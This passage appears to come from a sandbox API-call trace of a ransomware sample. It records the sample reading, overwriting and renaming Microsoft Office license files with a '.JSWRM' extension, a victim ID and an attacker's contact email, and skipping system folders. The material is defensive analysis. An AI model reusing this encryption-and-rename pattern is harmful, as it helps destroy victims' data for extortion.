returned 0x2411c8 [0102.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_KMS_Client-ul.xrm-ms", cchWideChar=28, lpMultiByteStr=0x2411c8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 28 [0102.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0102.812] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0102.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.812] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0102.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.812] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9601) returned 1 [0102.813] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.813] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2580) returned 0x24c1d0 [0102.813] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2580, lpOverlapped=0x0) returned 1 [0102.816] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.816] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2580, lpOverlapped=0x0) returned 1 [0102.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.816] CloseHandle (hObject=0x45c) returned 1 [0102.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0102.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0102.816] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0102.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0102.816] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23ddc8 [0102.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0102.816] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.816] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ddc8 | out: hHeap=0x1e0000) returned 1 [0102.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0102.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0102.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0102.817] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0102.817] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3aa5b3e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3aa5b3e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3b8a961, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x297b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelVL_MAK-pl.xrm-ms", cAlternateFileName="EXCELV~4.XRM")) returned 1 [0102.817] lstrcmpiW (lpString1="ExcelVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0102.817] lstrcmpiW (lpString1="ExcelVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0102.817] lstrcmpiW (lpString1="ExcelVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0102.817] lstrcmpiW (lpString1="ExcelVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0102.817] lstrcmpiW (lpString1="ExcelVL_MAK-pl.xrm-ms", lpString2="recovery") returned -1 [0102.817] lstrcmpiW (lpString1="ExcelVL_MAK-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.817] lstrcmpiW (lpString1="ExcelVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned 1 [0102.817] lstrcmpiW (lpString1="ExcelVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.817] lstrcmpiW (lpString1="ExcelVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.817] lstrcmpiW (lpString1="ExcelVL_MAK-pl.xrm-ms", lpString2="msocache") returned -1 [0102.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0102.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x241178, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 21 [0102.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0102.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0102.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-pl.xrm-ms", cchWideChar=21, lpMultiByteStr=0x241100, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 21 [0102.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0102.818] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0102.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0102.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.818] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10619) returned 1 [0102.818] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.818] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2970) returned 0x24c1d0 [0102.818] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2970, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2970, lpOverlapped=0x0) returned 1 [0102.822] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.822] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2970, lpOverlapped=0x0) returned 1 [0102.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.823] CloseHandle (hObject=0x45c) returned 1 [0102.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0102.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0102.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0102.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0102.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0102.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0102.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.823] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0102.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0102.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0102.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0102.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0102.824] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3aa5b3e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3aa5b3e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3bb0ba1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a8b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelVL_MAK-ppd.xrm-ms", cAlternateFileName="EXCELV~3.XRM")) returned 1 [0102.824] lstrcmpiW (lpString1="ExcelVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0102.824] lstrcmpiW (lpString1="ExcelVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0102.824] lstrcmpiW (lpString1="ExcelVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0102.824] lstrcmpiW (lpString1="ExcelVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0102.824] lstrcmpiW (lpString1="ExcelVL_MAK-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.824] lstrcmpiW (lpString1="ExcelVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.824] lstrcmpiW (lpString1="ExcelVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.824] lstrcmpiW (lpString1="ExcelVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.824] lstrcmpiW (lpString1="ExcelVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.824] lstrcmpiW (lpString1="ExcelVL_MAK-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0102.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x2410d8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0102.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0102.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0102.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ppd.xrm-ms", cchWideChar=22, lpMultiByteStr=0x241330, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0102.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0102.825] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0102.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0102.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.825] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6795) returned 1 [0102.825] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.825] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a80) returned 0x205850 [0102.825] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a80, lpOverlapped=0x0) returned 1 [0102.829] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.829] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a80, lpOverlapped=0x0) returned 1 [0102.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0102.829] CloseHandle (hObject=0x45c) returned 1 [0102.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0102.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0102.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0102.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0102.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0102.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0102.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.829] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelVL_MAK-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelvl_mak-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0102.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0102.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0102.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0102.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.830] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3a0d1e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3a0d1e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3b181c2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d38, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelVL_MAK-ul-oob.xrm-ms", cAlternateFileName="EXCELV~2.XRM")) returned 1 [0102.830] lstrcmpiW (lpString1="ExcelVL_MAK-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.831] lstrcmpiW (lpString1="ExcelVL_MAK-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.831] lstrcmpiW (lpString1="ExcelVL_MAK-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.831] lstrcmpiW (lpString1="ExcelVL_MAK-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.831] lstrcmpiW (lpString1="ExcelVL_MAK-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.831] lstrcmpiW (lpString1="ExcelVL_MAK-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.831] lstrcmpiW (lpString1="ExcelVL_MAK-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0102.831] lstrcmpiW (lpString1="ExcelVL_MAK-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.831] lstrcmpiW (lpString1="ExcelVL_MAK-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.831] lstrcmpiW (lpString1="ExcelVL_MAK-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0102.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelVL_MAK-ul-oob.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241290, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelVL_MAK-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0102.831] 